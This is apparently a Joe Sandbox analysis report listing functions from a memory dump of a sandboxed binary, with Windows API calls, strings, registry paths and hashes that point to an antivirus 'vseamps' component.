Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFDA580FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: 704a0aabc537f1e31f0afbca255925d9eba168ec405761a3cd791702eec614ca
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: A1F06271B1A2998AEBA4CF3CE852B397BD0F7487C0F948079D68D83B44D63C90618F08

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

msi.dll, xrefs: 0000000140001042
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseInit, xrefs: 00000001400010FA
vseGet, xrefs: 000000014000114B
vseSet, xrefs: 0000000140001166
MsiLocateComponentW, xrefs: 0000000140001062
vseGlobalInit, xrefs: 00000001400010C8
vseGlobalRelease, xrefs: 00000001400010DF
vseRelease, xrefs: 0000000140001115
vseExec, xrefs: 0000000140001130

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

?, xrefs: 0000000140002FFE
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
action, xrefs: 0000000140003020

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtAdd, xrefs: 0000000140002BD5
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtRelease, xrefs: 0000000140002BBA
vseqrtInit, xrefs: 0000000140002BA3

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: done, pHandle=%p, xrefs: 00000001400035CC
amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
